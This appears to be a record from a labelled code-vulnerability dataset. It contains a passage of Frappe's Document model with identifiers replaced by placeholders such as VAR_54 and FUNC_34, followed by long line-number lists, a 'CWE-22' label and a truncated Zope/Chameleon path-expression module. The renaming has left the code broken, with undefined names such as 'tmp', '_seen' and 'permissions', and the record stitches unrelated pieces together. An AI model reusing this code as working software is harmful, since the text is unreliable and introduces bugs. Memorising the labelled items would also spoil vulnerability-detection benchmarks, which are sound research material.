if frappe.flags.in_install == 'frappe': return
VAR_53 = self.meta.get_workflow()
if VAR_53:
FUNC_25(self)
if not self._action == 'save':
set_workflow_state_on_action(self, VAR_53, self._action)
def FUNC_26(self):
VAR_54 = self.meta.get_set_only_once_fields()
if VAR_54 and self._doc_before_save:
for field in VAR_54:
VAR_98 = False
VAR_26 = self.get(field.fieldname)
VAR_55 = self._doc_before_save.get(field.fieldname)
if field.fieldtype in VAR_82:
VAR_98 = not self.is_child_table_same(field.fieldname)
elif field.fieldtype in ('Date', 'Datetime', 'Time'):
VAR_98 = str(VAR_26) != str(VAR_55)
else:
VAR_98 = VAR_26 != VAR_55
if VAR_98:
frappe.throw(_("Value cannot be changed for {0}").format(self.meta.get_label(field.fieldname)),
frappe.CannotChangeConstantError)
return False
def FUNC_27(self, VAR_18):
VAR_26 = self.get(VAR_18)
VAR_55 = self._doc_before_save.get(VAR_18)
VAR_56 = True
if len(VAR_55) != len(VAR_26):
VAR_56 = False
else:
for i, VAR_21 in enumerate(VAR_55):
VAR_99 = VAR_26[i].as_dict(convert_dates_to_str = True)
VAR_100 = VAR_21.as_dict(convert_dates_to_str = True)
for VAR_45 in ('modified', 'modified_by', 'creation'):
del VAR_99[VAR_45]
del VAR_100[VAR_45]
if VAR_100 != VAR_99:
VAR_56 = False
break
return VAR_56
def FUNC_28(self):
if frappe.session.user == "Administrator":
return
VAR_57 = False
VAR_58 = self.meta.fields.copy()
for table_field in self.meta.get_table_fields():
VAR_58 += frappe.get_meta(table_field.options).fields or []
for VAR_19 in VAR_58:
if VAR_19.permlevel > 0:
VAR_57 = True
break
if not VAR_57:
return
VAR_59 = self.get_permlevel_access('read')
for VAR_19 in self.meta.fields:
if VAR_19.permlevel and not VAR_19.permlevel in VAR_59:
self.set(VAR_19.fieldname, None)
for table_field in self.meta.get_table_fields():
for VAR_19 in frappe.get_meta(table_field.options).fields or []:
if VAR_19.permlevel and not VAR_19.permlevel in VAR_59:
for child in self.get(table_field.fieldname) or []:
child.set(VAR_19.fieldname, None)
def FUNC_29(self):
if self.flags.ignore_permissions or frappe.flags.in_install:
return
if frappe.session.user == "Administrator":
return
VAR_59 = self.get_permlevel_access()
VAR_60 = self.meta.get_high_permlevel_fields()
if VAR_60:
self.reset_values_if_no_permlevel_access(VAR_59, VAR_60)
if self.is_new(): return
for VAR_19 in self.meta.get_table_fields():
VAR_60 = frappe.get_meta(VAR_19.options).get_high_permlevel_fields()
if VAR_60:
for VAR_21 in self.get(VAR_19.fieldname):
VAR_21.reset_values_if_no_permlevel_access(VAR_59, VAR_60)
def FUNC_30(self, VAR_22='write'):
if not hasattr(self, "_has_access_to"):
self._has_access_to = {}
self._has_access_to[VAR_22] = []
VAR_61 = frappe.get_roles()
for perm in self.get_permissions():
if perm.role in VAR_61 and perm.get(VAR_22):
if perm.permlevel not in self._has_access_to[VAR_22]:
self._has_access_to[VAR_22].append(perm.permlevel)
return self._has_access_to[VAR_22]
def FUNC_31(self, VAR_18, VAR_19=None, VAR_22='read'):
if not VAR_19:
VAR_19 = self.meta.get_field(VAR_18)
return VAR_19.permlevel in self.get_permlevel_access(VAR_22)
def FUNC_32(self):
if self.meta.istable:
permissions = frappe.get_meta(self.parenttype).permissions
else:
VAR_86 = self.meta.permissions
return VAR_86
def FUNC_33(self):
if frappe.flags.in_import:
return
VAR_62 = frappe.new_doc(self.doctype, as_dict=True)
self.update_if_missing(VAR_62)
for VAR_19 in self.meta.get_table_fields():
VAR_62 = frappe.new_doc(VAR_19.options, as_dict=True)
VAR_26 = self.get(VAR_19.fieldname)
if isinstance(VAR_26, list):
for VAR_21 in VAR_26:
VAR_21.update_if_missing(VAR_62)
def FUNC_34(self):
VAR_63 = False
self._action = "save"
if not self.get('__islocal'):
if self.meta.issingle:
VAR_101 = frappe.db.sql("""select VAR_26 from tabSingles
where VAR_2=%s and field='modified' for update""", self.doctype)
VAR_101 = VAR_101 and VAR_101[0][0]
if VAR_101 and VAR_101 != cstr(self._original_modified):
VAR_63 = True
else:
VAR_102 = frappe.db.sql("""select VAR_101, VAR_23 from `tab{0}`
where VAR_3 = %s for update""".format(self.doctype), self.name, as_dict=True)
if not VAR_102:
frappe.throw(_("Record does not exist"))
else:
VAR_102 = tmp[0]
VAR_101 = cstr(VAR_102.modified)
if VAR_101 and VAR_101 != cstr(self._original_modified):
VAR_63 = True
self.check_docstatus_transition(VAR_102.docstatus)
if VAR_63:
frappe.msgprint(_("Error: CLASS_0 has been VAR_101 after you have opened it") \
+ (" (%s, %s). " % (VAR_101, self.modified)) \
+ _("Please refresh to get the latest document."),
VAR_35=frappe.TimestampMismatchError)
else:
self.check_docstatus_transition(0)
def FUNC_35(self, VAR_23):
if not self.docstatus:
self.docstatus = 0
if VAR_23==0:
if self.docstatus==0:
self._action = "save"
elif self.docstatus==1:
self._action = "submit"
self.check_permission("submit")
else:
raise frappe.DocstatusTransitionError(_("Cannot change VAR_23 from 0 to 2"))
elif VAR_23==1:
if self.docstatus==1:
self._action = "update_after_submit"
self.check_permission("submit")
elif self.docstatus==2:
self._action = "cancel"
self.check_permission("cancel")
else:
raise frappe.DocstatusTransitionError(_("Cannot change VAR_23 from 1 to 0"))
elif VAR_23==2:
raise frappe.ValidationError(_("Cannot edit cancelled document"))
def FUNC_36(self):
for VAR_21 in self.get_all_children():
VAR_21.parent = self.name
VAR_21.parenttype = self.doctype
def FUNC_37(self):
for VAR_21 in self.get_all_children():
if not VAR_21.name:
FUNC_17(VAR_21)
def FUNC_38(self):
if self.flags.ignore_validate_update_after_submit:
return
self._validate_update_after_submit()
for VAR_21 in self.get_all_children():
if VAR_21.is_new() and self.meta.get_field(VAR_21.parentfield).allow_on_submit:
continue
VAR_21._validate_update_after_submit()
def FUNC_39(self):
if self.flags.ignore_mandatory:
return
VAR_64 = self._get_missing_mandatory_fields()
for VAR_21 in self.get_all_children():
VAR_64.extend(VAR_21._get_missing_mandatory_fields())
if not VAR_64:
return
for VAR_18, VAR_88 in VAR_64:
msgprint(VAR_88)
if frappe.flags.print_messages:
print(self.as_json().encode("utf-8"))
raise frappe.MandatoryError('[{VAR_2}, {VAR_3}]: {fields}'.format(
fields=", ".join((each[0] for each in VAR_64)),
VAR_2=self.doctype,
VAR_3=self.name))
def FUNC_40(self):
if self.flags.ignore_links or self._action == "cancel":
return
VAR_65, VAR_66 = self.get_invalid_links()
for VAR_21 in self.get_all_children():
VAR_87 = VAR_21.get_invalid_links(is_submittable=self.meta.is_submittable)
VAR_65.extend(VAR_87[0])
VAR_66.extend(VAR_87[1])
if VAR_65:
VAR_88 = ", ".join((each[2] for each in VAR_65))
frappe.throw(_("Could not find {0}").format(VAR_88),
frappe.LinkValidationError)
if VAR_66:
VAR_88 = ", ".join((each[2] for each in VAR_66))
frappe.throw(_("Cannot link cancelled document: {0}").format(VAR_88),
frappe.CancelledLinkError)
def FUNC_41(self, VAR_24=None):
VAR_67 = []
for VAR_19 in self.meta.get("fields", {"fieldtype": ['in', VAR_82]}):
if VAR_24:
if VAR_19.options==VAR_24:
return self.get(VAR_19.fieldname)
VAR_26 = self.get(VAR_19.fieldname)
if isinstance(VAR_26, list):
VAR_67.extend(VAR_26)
return VAR_67
def FUNC_42(self, VAR_25, *VAR_0, **VAR_1):
if "flags" in VAR_1:
del VAR_1["flags"]
if hasattr(self, VAR_25) and hasattr(getattr(self, VAR_25), "__call__"):
VAR_6 = lambda self, *VAR_0, **VAR_1: getattr(self, VAR_25)(*VAR_0, **VAR_1)
else:
VAR_6 = lambda self, *VAR_0, **VAR_1: None
VAR_6.__name__ = str(VAR_25)
VAR_68 = CLASS_0.hook(VAR_6)(self, *VAR_0, **VAR_1)
self.run_notifications(VAR_25)
run_webhooks(self, VAR_25)
run_server_script_for_doc_event(self, VAR_25)
return VAR_68
def FUNC_43(self, VAR_25, *VAR_0, **VAR_1):
return self.run_method(VAR_25, *VAR_0, **VAR_1)
def FUNC_44(self, VAR_25):
if (frappe.flags.in_import and frappe.flags.mute_emails) or frappe.flags.in_patch or frappe.flags.in_install:
return
if self.flags.notifications_executed==None:
self.flags.notifications_executed = []
from frappe.email.doctype.notification.notification import evaluate_alert
if self.flags.notifications == None:
VAR_89 = frappe.cache().hget('notifications', self.doctype)
if VAR_89==None:
VAR_89 = frappe.get_all('Notification', fields=['name', 'event', 'method'],
filters={'enabled': 1, 'document_type': self.doctype})
frappe.cache().hset('notifications', self.doctype, VAR_89)
self.flags.notifications = VAR_89
if not self.flags.notifications:
return
def FUNC_82(VAR_69):
if not VAR_69.name in self.flags.notifications_executed:
evaluate_alert(self, VAR_69.name, VAR_69.event)
self.flags.notifications_executed.append(VAR_69.name)
VAR_70 = {
"on_update": "Save",
"after_insert": "New",
"on_submit": "Submit",
"on_cancel": "Cancel"
}
if not self.flags.in_insert:
VAR_70['on_change'] = 'Value Change'
for VAR_69 in self.flags.notifications:
VAR_90 = VAR_70.get(VAR_25, None)
if VAR_90 and VAR_69.event == VAR_90:
FUNC_82(VAR_69)
elif VAR_69.event=='Method' and VAR_25 == VAR_69.method:
FUNC_82(VAR_69)
@FUNC_2.__func__
def FUNC_45(self):
self.docstatus = 1
self.save()
@FUNC_2.__func__
def FUNC_46(self):
self.docstatus = 2
self.save()
@FUNC_2.__func__
def FUNC_47(self):
self._submit()
@FUNC_2.__func__
def FUNC_48(self):
self._cancel()
def FUNC_49(self, VAR_11=False):
frappe.delete_doc(self.doctype, self.name, VAR_11 = ignore_permissions, flags=self.flags)
def FUNC_50(self):
self.load_doc_before_save()
self.reset_seen()
if self._action in ("save", "submit"):
self.run_method("before_validate")
if self.flags.ignore_validate:
return
if self._action=="save":
self.run_method("validate")
self.run_method("before_save")
elif self._action=="submit":
self.run_method("validate")
self.run_method("before_submit")
elif self._action=="cancel":
self.run_method("before_cancel")
elif self._action=="update_after_submit":
self.run_method("before_update_after_submit")
self.set_title_field()
def FUNC_51(self):
self._doc_before_save = None
if not self.is_new():
try:
self._doc_before_save = frappe.get_doc(self.doctype, self.name)
except frappe.DoesNotExistError:
self._doc_before_save = None
frappe.clear_last_message()
def FUNC_52(self):
VAR_71 = self.get_doc_before_save()
if self._action=="save":
self.run_method("on_update")
elif self._action=="submit":
self.run_method("on_update")
self.run_method("on_submit")
elif self._action=="cancel":
self.run_method("on_cancel")
self.check_no_back_links_exist()
elif self._action=="update_after_submit":
self.run_method("on_update_after_submit")
self.clear_cache()
self.notify_update()
update_global_search(self)
self.save_version()
self.run_method('on_change')
if (self.doctype, self.name) in frappe.flags.currently_saving:
frappe.flags.currently_saving.remove((self.doctype, self.name))
self.latest = None
def FUNC_53(self):
frappe.clear_document_cache(self.doctype, self.name)
def FUNC_54(self):
if getattr(self.meta, 'track_seen', False):
frappe.db.set_value(self.doctype, self.name, "_seen", json.dumps([frappe.session.user]), VAR_27=False)
def FUNC_55(self):
if frappe.flags.in_patch: return
frappe.publish_realtime("doc_update", {"modified": self.modified, "doctype": self.doctype, "name": self.name},
VAR_2=self.doctype, docname=self.name, after_commit=True)
if not self.meta.get("read_only") and not self.meta.get("issingle") and \
not self.meta.get("istable"):
VAR_91 = {
"doctype": self.doctype,
"name": self.name,
"user": frappe.session.user
}
frappe.publish_realtime("list_update", VAR_91, after_commit=True)
def FUNC_56(self, VAR_18, VAR_26=None, VAR_27=True, VAR_28=False, VAR_29=False):
if isinstance(VAR_18, dict):
self.update(VAR_18)
else:
self.set(VAR_18, VAR_26)
if VAR_27 and (self.doctype, self.name) not in frappe.flags.currently_saving:
self.set("modified", now())
self.set("modified_by", frappe.session.user)
self.load_doc_before_save()
self.run_method('before_change')
frappe.db.set_value(self.doctype, self.name, VAR_18, VAR_26,
self.modified, self.modified_by, VAR_27=update_modified)
self.run_method('on_change')
if VAR_28:
self.notify_update()
self.clear_cache()
if VAR_29:
frappe.db.commit()
def FUNC_57(self, VAR_18):
return frappe.db.get_value(self.doctype, self.name, VAR_18)
def FUNC_58(self):
from frappe.model.delete_doc import check_if_doc_is_linked, check_if_doc_is_dynamically_linked
if not self.flags.ignore_links:
check_if_doc_is_linked(self, VAR_25="Cancel")
check_if_doc_is_dynamically_linked(self, VAR_25="Cancel")
def FUNC_59(self):
if (not getattr(self.meta, 'track_changes', False)
or self.doctype == 'Version'
or self.flags.ignore_version
or frappe.flags.in_install
or (not self._doc_before_save and frappe.flags.in_patch)):
return
VAR_72 = frappe.new_doc('Version')
if not self._doc_before_save:
VAR_72.for_insert(self)
VAR_72.insert(VAR_11=True)
elif VAR_72.set_diff(self._doc_before_save, self):
VAR_72.insert(VAR_11=True)
if not frappe.flags.in_migrate:
follow_document(self.doctype, self.name, frappe.session.user)
@staticmethod
def FUNC_60(VAR_30):
def FUNC_83(self, VAR_73):
if isinstance(VAR_73, dict):
if not self.get("_return_value"):
self._return_value = {}
self._return_value.update(VAR_73)
else:
self._return_value = VAR_73 or self.get("_return_value")
def FUNC_84(VAR_6, *VAR_74):
def FUNC_86(self, VAR_25, *VAR_0, **VAR_1):
FUNC_83(self, VAR_6(self, *VAR_0, **VAR_1))
for VAR_30 in VAR_74:
FUNC_83(self, VAR_30(self, VAR_25, *VAR_0, **VAR_1))
return self._return_value
return FUNC_86
def FUNC_85(self, *VAR_0, **VAR_1):
VAR_74 = []
VAR_25 = VAR_30.__name__
VAR_92 = frappe.get_doc_hooks()
for handler in VAR_92.get(self.doctype, {}).get(VAR_25, []) \
+ VAR_92.get("*", {}).get(VAR_25, []):
VAR_74.append(frappe.get_attr(handler))
VAR_93 = FUNC_84(VAR_30, *VAR_74)
return VAR_93(self, VAR_25, *VAR_0, **VAR_1)
return FUNC_85
def FUNC_61(self, VAR_31):
VAR_25 = getattr(self, VAR_31, None)
if not VAR_6:
raise NotFound("Method {0} not found".format(VAR_31))
FUNC_61(getattr(VAR_25, '__func__', VAR_25))
def FUNC_62(self, VAR_18, VAR_32, VAR_33, VAR_34=None, VAR_35=None):
VAR_75 = {
"in": _("one of"),
"not in": _("none of"),
"^": _("beginning with"),
}
if not VAR_34:
doc = self
VAR_76 = VAR_34.get_value(VAR_18)
VAR_19 = VAR_34.meta.get_field(VAR_18)
VAR_33 = VAR_34.cast(VAR_33, VAR_19)
if not frappe.compare(VAR_76, VAR_32, VAR_33):
VAR_94 = VAR_34.meta.get_label(VAR_18)
VAR_95 = VAR_75.get(VAR_32, condition)
if VAR_34.parentfield:
VAR_88 = _("Incorrect VAR_26 in row {0}: {1} must be {2} {3}").format(VAR_34.idx, VAR_94, VAR_95, VAR_33)
else:
VAR_88 = _("Incorrect VAR_26: {0} must be {1} {2}").format(VAR_94, VAR_95, VAR_33)
msgprint(VAR_88, VAR_35=raise_exception or True)
def FUNC_63(self, VAR_36, VAR_35=None):
if not (isinstance(self.get(VAR_36), list) and len(self.get(VAR_36)) > 0):
VAR_94 = self.meta.get_label(VAR_36)
frappe.throw(_("Table {0} cannot be empty").format(VAR_94), VAR_35 or frappe.EmptyTableError)
def FUNC_64(self, VAR_34, VAR_37=None):
if not VAR_37:
fieldnames = (VAR_19.fieldname for VAR_19 in
VAR_34.meta.get("fields", {"fieldtype": ["in", ["Currency", "Float", "Percent"]]}))
for VAR_18 in VAR_37:
VAR_34.set(VAR_18, flt(VAR_34.get(VAR_18), self.precision(VAR_18, VAR_34.parentfield)))
def FUNC_65(self):
return "/app/Form/{VAR_2}/{VAR_3}".format(VAR_2=self.doctype, VAR_3=self.name)
def FUNC_66(self, VAR_38='Comment', VAR_39=None, VAR_40=None, VAR_41=None, VAR_42=None, VAR_43=None):
VAR_68 = frappe.get_doc({
"doctype":"Comment",
'comment_type': VAR_38,
"comment_email": VAR_40 or frappe.session.user,
"comment_by": VAR_43,
"reference_doctype": self.doctype,
"reference_name": self.name,
"content": VAR_39 or VAR_38,
"link_doctype": VAR_41,
"link_name": VAR_42
}).insert(VAR_11=True)
return VAR_68
def FUNC_67(self, VAR_44=None):
if not VAR_44:
user = frappe.session.user
if self.meta.track_seen:
VAR_96 = self.get('_seen') or []
VAR_96 = frappe.parse_json(VAR_96)
if VAR_44 not in VAR_96:
_seen.append(VAR_44)
frappe.db.set_value(self.doctype, self.name, '_seen', json.dumps(VAR_96), VAR_27=False)
frappe.local.flags.commit = True
def FUNC_68(self, VAR_44=None):
if not VAR_44:
user = frappe.session.user
if hasattr(self.meta, 'track_views') and self.meta.track_views:
frappe.get_doc({
"doctype": "View Log",
"viewed_by": frappe.session.user,
"reference_doctype": self.doctype,
"reference_name": self.name,
}).insert(VAR_11=True)
frappe.local.flags.commit = True
def FUNC_69(self):
return hashlib.sha224(get_datetime_str(self.creation).encode()).hexdigest()
def FUNC_70(self):
VAR_77 = getattr(self, "_liked_by", None)
if VAR_77:
return json.loads(VAR_77)
else:
return []
def FUNC_71(self, VAR_45, VAR_26):
if not self.get("__onload"):
self.set("__onload", frappe._dict())
self.get("__onload")[VAR_45] = VAR_26
def FUNC_72(self, VAR_45=None):
if not VAR_45:
return self.get("__onload", frappe._dict())
return self.get('__onload')[VAR_45]
def FUNC_73(self, VAR_4, **VAR_1):
from frappe.utils.background_jobs import enqueue
if hasattr(self, '_' + VAR_4):
action = '_' + VAR_4
if file_lock.lock_exists(self.get_signature()):
frappe.throw(_('This document is currently queued for execution. Please try again'),
title=_('Document Queued'))
self.lock()
enqueue('frappe.model.document.execute_action', VAR_2=self.doctype, VAR_3=self.name,
VAR_4=action, **VAR_1)
def FUNC_74(self, VAR_46=None):
VAR_78 = self.get_signature()
if file_lock.lock_exists(VAR_78):
VAR_97 = True
if VAR_46:
for i in range(VAR_46):
time.sleep(1)
if not file_lock.lock_exists(VAR_78):
VAR_97 = False
break
if VAR_97:
raise frappe.DocumentLockedError
file_lock.create_lock(VAR_78)
def FUNC_75(self):
file_lock.delete_lock(self.get_signature())
def FUNC_76(self, VAR_47, VAR_48):
if date_diff(self.get(VAR_48), self.get(VAR_47)) < 0:
frappe.throw(_('{0} must be after {1}').format(
frappe.bold(self.meta.get_label(VAR_48)),
frappe.bold(self.meta.get_label(VAR_47)),
), frappe.exceptions.InvalidDates)
def FUNC_77(self):
VAR_79 = frappe.get_all('ToDo',
fields=['owner'],
filters={
'reference_type': self.doctype,
'reference_name': self.name,
'status': ('!=', 'Cancelled'),
})
VAR_80 = set([assignment.owner for assignment in VAR_79])
return VAR_80
def FUNC_78(self, VAR_49):
from frappe.desk.doctype.tag.tag import DocTags
DocTags(self.doctype).add(self.name, VAR_49)
def FUNC_79(self):
from frappe.desk.doctype.tag.tag import DocTags
return DocTags(self.doctype).get_tags(self.name).split(",")[1:]
def FUNC_1(VAR_2, VAR_3, VAR_4, **VAR_1):
VAR_34 = frappe.get_doc(VAR_2, VAR_3)
VAR_34.unlock()
try:
getattr(VAR_34, VAR_4)(**VAR_1)
except Exception:
frappe.db.rollback()
if frappe.local.message_log:
VAR_88 = json.loads(frappe.local.message_log[-1]).get('message')
else:
VAR_88 = '<pre><code>' + frappe.get_traceback() + '</pre></code>'
VAR_34.add_comment('Comment', _('Action Failed') + '<br><br>' + VAR_88)
VAR_34.notify_update()
| [
1,
2,
3,
21,
22,
23,
24,
27,
31,
33,
34,
36,
37,
45,
46,
48,
49,
54,
58,
60,
62,
65,
71,
75,
77,
82,
85,
92,
94,
96,
101,
108,
111,
114,
116,
118,
120,
123,
125,
127,
133,
137,
147,
151,
156,
158,
164,
173,
174,
177,
182,
187,
191,
196,
201,
207,
211,
213,
216,
219,
222,
224,
235,
241,
242,
243,
244,
253,
254,
257,
260,
263,
264,
265,
269,
270,
273,
274,
277,
281,
285,
289,
292,
297,
299,
302,
304,
308,
310,
316,
320,
323,
326,
328,
329,
334,
337,
338,
341,
343,
347,
348,
350,
351,
360,
361,
366,
372,
376,
378,
379,
381,
383,
389,
392,
394,
398,
401,
406,
409,
412,
413,
418,
423,
425,
428,
430,
434,
439,
444,
447,
451,
453,
461,
464,
473,
481,
483,
487,
490,
501,
512,
517,
525,
528,
532,
541,
545,
547,
552,
559,
563,
565,
571,
575,
579,
580,
584,
588,
590,
593,
596,
598,
602,
607,
610,
612,
616,
622,
627,
630,
633,
636,
637,
639,
640,
646,
650,
657,
659,
663,
665,
668,
672,
674,
678,
681,
682,
689,
695,
710,
715,
717,
720,
722,
730,
734,
739,
751,
761,
764,
770,
772,
776,
780,
784,
786,
788,
789,
790,
794,
798,
801,
804,
807,
812,
816,
818,
823,
828,
833,
845,
850,
854,
856,
859,
863,
865,
868,
873,
876,
878,
886,
889,
894,
901,
903,
905,
912,
918,
924,
929,
934,
938,
941,
946,
948,
951,
952,
955,
958,
969,
971,
981,
984,
989,
991,
1002,
1003,
1006,
1008,
1010,
1012,
1015,
1017,
1020,
1025,
1029,
1032,
1041,
1044,
1047,
1058,
1060,
1061,
1064,
1066,
1068,
1071,
1073,
1076,
1080,
1084,
1091,
1094,
1095,
1102,
1110,
1112,
1116,
1127,
1133,
1135,
1137,
1145,
1148,
1150,
1157,
1166,
1169,
1171,
1174,
1182,
1183,
1185,
1191,
1194,
1200,
1203,
1207,
1210,
1212,
1225,
1230,
1234,
1239,
1244,
1253,
1257,
1264,
1269,
1273,
1275,
1279,
1280,
1281,
1283,
1286,
1290,
1294,
1298,
1312,
1316,
1317,
1327,
1336,
1339,
1344,
1349,
1358,
1359,
1364,
1367,
1368,
1369,
1370,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
51,
79,
1351,
81,
82,
83,
84,
85,
86,
87,
88,
130,
135,
139,
140,
184,
189,
190,
191,
192,
198,
204,
205,
206,
207,
208,
283,
287,
288,
289,
290,
291,
292,
293,
294,
345,
363,
368,
403,
408,
432,
436,
455,
534,
543,
567,
592,
624,
691,
692,
693,
694,
695,
696,
697,
732,
733,
734,
735,
736,
737,
738,
739,
740,
766,
835,
847,
870,
915,
921,
927,
932,
936,
940,
941,
942,
943,
944,
945,
946,
947,
973,
983,
984,
985,
986,
987,
988,
1022,
1027,
1043,
1044,
1045,
1046,
1047,
1048,
1049,
1050,
1051,
1052,
1053,
1082,
1086,
1093,
1115,
1116,
1117,
1118,
1119,
1159,
1160,
1187,
1193,
1194,
1195,
1196,
1205,
1209,
1210,
1211,
1227,
1241,
1255,
1277,
1278,
1296,
1297,
1298,
1299,
1314,
1319,
1320,
1321,
1341,
1346
] | [
1,
2,
3,
21,
22,
23,
24,
27,
31,
33,
34,
36,
37,
45,
46,
48,
49,
54,
58,
60,
62,
65,
71,
75,
77,
82,
85,
92,
94,
96,
101,
108,
111,
114,
116,
118,
120,
123,
125,
127,
133,
137,
147,
151,
156,
158,
164,
173,
174,
177,
182,
187,
191,
196,
201,
207,
211,
213,
216,
219,
222,
224,
235,
241,
242,
243,
244,
253,
254,
257,
260,
263,
264,
265,
269,
270,
273,
274,
277,
281,
285,
289,
292,
297,
299,
302,
304,
308,
310,
316,
320,
323,
326,
328,
329,
334,
337,
338,
341,
343,
347,
348,
350,
351,
360,
361,
366,
372,
376,
378,
379,
381,
383,
389,
392,
394,
398,
401,
406,
409,
412,
413,
418,
423,
425,
428,
430,
434,
439,
444,
447,
451,
453,
461,
464,
473,
481,
483,
487,
490,
501,
512,
517,
525,
528,
532,
541,
545,
547,
552,
559,
563,
565,
571,
575,
579,
580,
584,
588,
590,
593,
596,
598,
602,
607,
610,
612,
616,
622,
627,
630,
633,
636,
637,
639,
640,
646,
650,
657,
659,
663,
665,
668,
672,
674,
678,
681,
682,
689,
695,
710,
715,
717,
720,
722,
730,
734,
739,
751,
761,
764,
770,
772,
776,
780,
784,
786,
788,
789,
790,
794,
798,
801,
804,
807,
812,
816,
818,
823,
828,
833,
845,
850,
854,
856,
859,
863,
865,
868,
873,
876,
878,
886,
889,
894,
901,
903,
905,
912,
918,
924,
929,
934,
938,
941,
946,
948,
951,
952,
955,
958,
969,
971,
981,
984,
989,
991,
1002,
1003,
1006,
1008,
1010,
1012,
1015,
1017,
1020,
1025,
1029,
1032,
1041,
1044,
1047,
1058,
1060,
1061,
1064,
1066,
1068,
1071,
1073,
1076,
1080,
1084,
1091,
1094,
1095,
1102,
1110,
1112,
1116,
1127,
1133,
1135,
1137,
1145,
1148,
1150,
1155,
1157,
1166,
1169,
1171,
1174,
1182,
1183,
1185,
1191,
1194,
1200,
1203,
1207,
1210,
1212,
1225,
1230,
1234,
1239,
1244,
1253,
1257,
1264,
1269,
1273,
1275,
1279,
1280,
1281,
1283,
1286,
1290,
1294,
1298,
1312,
1316,
1317,
1327,
1336,
1339,
1344,
1349,
1358,
1359,
1364,
1367,
1368,
1369,
1370,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
51,
79,
1351,
81,
82,
83,
84,
85,
86,
87,
88,
130,
135,
139,
140,
184,
189,
190,
191,
192,
198,
204,
205,
206,
207,
208,
283,
287,
288,
289,
290,
291,
292,
293,
294,
345,
363,
368,
403,
408,
432,
436,
455,
534,
543,
567,
592,
624,
691,
692,
693,
694,
695,
696,
697,
732,
733,
734,
735,
736,
737,
738,
739,
740,
766,
835,
847,
870,
915,
921,
927,
932,
936,
940,
941,
942,
943,
944,
945,
946,
947,
973,
983,
984,
985,
986,
987,
988,
1022,
1027,
1043,
1044,
1045,
1046,
1047,
1048,
1049,
1050,
1051,
1052,
1053,
1082,
1086,
1093,
1115,
1116,
1117,
1118,
1119,
1159,
1160,
1187,
1193,
1194,
1195,
1196,
1205,
1209,
1210,
1211,
1227,
1241,
1255,
1277,
1278,
1296,
1297,
1298,
1299,
1314,
1319,
1320,
1321,
1341,
1346
] |
0CWE-22
| """``chameleon.tales`` expressions."""
import warnings
from ast import NodeTransformer
from ast import parse
from chameleon.astutil import Static
from chameleon.astutil import Symbol
from chameleon.codegen import template
from chameleon.tales import NotExpr
from chameleon.tales import StringExpr
from AccessControl.ZopeGuards import guarded_apply
from AccessControl.ZopeGuards import guarded_getattr
from AccessControl.ZopeGuards import guarded_getitem
from AccessControl.ZopeGuards import guarded_iter
from AccessControl.ZopeGuards import protected_inplacevar
from OFS.interfaces import ITraversable
from RestrictedPython import RestrictingNodeTransformer
from RestrictedPython.Utilities import utility_builtins
from z3c.pt import expressions
from zExceptions import NotFound
from zExceptions import Unauthorized
from zope.interface import implementer
from zope.tales.tales import ExpressionEngine
from zope.traversing.adapters import traversePathElement
from zope.traversing.interfaces import TraversalError
from .Expressions import render
from .interfaces import IZopeAwareEngine
_marker = object()
zope2_exceptions = (
AttributeError,
LookupError,
NameError,
TypeError,
ValueError,
NotFound,
Unauthorized,
TraversalError,
)
def static(obj):
return Static(template("obj", obj=Symbol(obj), mode="eval"))
class BoboAwareZopeTraverse:
traverse_method = 'restrictedTraverse'
__slots__ = ()
@classmethod
def traverse(cls, base, request, path_items):
"""See ``zope.app.pagetemplate.engine``."""
path_items = list(path_items)
path_items.reverse()
while path_items:
name = path_items.pop()
if name == '_':
warnings.warn('Traversing to the name `_` is deprecated '
'and will be removed in Zope 6.',
DeprecationWarning)
elif name.startswith('_'):
raise NotFound(name)
if ITraversable.providedBy(base):
base = getattr(base, cls.traverse_method)(name)
else:
base = traversePathElement(base, name, path_items,
request=request)
return base
def __call__(self, base, econtext, call, path_items):
request = econtext.get('request')
if path_items:
base = self.traverse(base, request, path_items)
if call is False:
return base
if getattr(base, '__call__', _marker) is not _marker or \
callable(base):
base = render(base, econtext)
return base
class TrustedBoboAwareZopeTraverse(BoboAwareZopeTraverse):
traverse_method = 'unrestrictedTraverse'
__slots__ = ()
def __call__(self, base, econtext, call, path_items):
request = econtext.get('request')
base = self.traverse(base, request, path_items)
if call is False:
return base
if getattr(base, '__call__', _marker) is not _marker or \
isinstance(base, type):
return base()
return base
class PathExpr(expressions.PathExpr):
exceptions = zope2_exceptions
traverser = Static(template(
"cls()", cls=Symbol(BoboAwareZopeTraverse), mode="eval"
))
class TrustedPathExpr(PathExpr):
traverser = Static(template(
"cls()", cls=Symbol(TrustedBoboAwareZopeTraverse), mode="eval"
))
class NocallExpr(expressions.NocallExpr, PathExpr):
pass
class ExistsExpr(expressions.ExistsExpr):
exceptions = zope2_exceptions
class RestrictionTransform(NodeTransformer):
secured = {
'_getattr_': guarded_getattr,
'_getitem_': guarded_getitem,
'_apply_': guarded_apply,
'_getiter_': guarded_iter,
'_inplacevar_': protected_inplacevar,
}
def visit_Name(self, node):
value = self.secured.get(node.id)
if value is not None:
return Symbol(value)
return node
class UntrustedPythonExpr(expressions.PythonExpr):
restricted_python_transformer = RestrictingNodeTransformer()
page_templates_expression_transformer = RestrictionTransform()
# Make copy of parent expression builtins
builtins = expressions.PythonExpr.builtins.copy()
# Update builtins with Restricted Python utility builtins
builtins.update({
name: static(builtin) for (name, builtin) in utility_builtins.items()
})
def parse(self, string):
encoded = string.encode('utf-8')
node = parse(encoded, mode='eval')
# Run Node Transformation from RestrictedPython:
self.restricted_python_transformer.visit(node)
# Run PageTemplate.expression RestrictedPython Transform:
self.page_templates_expression_transformer.visit(node)
return node
# Whether an engine is Zope aware does not depend on the class
# but how it is configured - especially, that is uses a Zope aware
# `PathExpr` implementation.
# Nevertheless, we mark the class as "Zope aware" for simplicity
# assuming that users of the class use a proper `PathExpr`
@implementer(IZopeAwareEngine)
class ChameleonEngine(ExpressionEngine):
"""Expression engine for ``chameleon.tales``.
Only partially implemented: its ``compile`` is currently unusable
"""
def compile(self, expression):
raise NotImplementedError()
types = dict(
python=UntrustedPythonExpr,
string=StringExpr,
not_=NotExpr,
exists=ExistsExpr,
path=PathExpr,
provider=expressions.ProviderExpr,
nocall=NocallExpr)
def createChameleonEngine(types=types, untrusted=True, **overrides):
e = ChameleonEngine()
def norm(k):
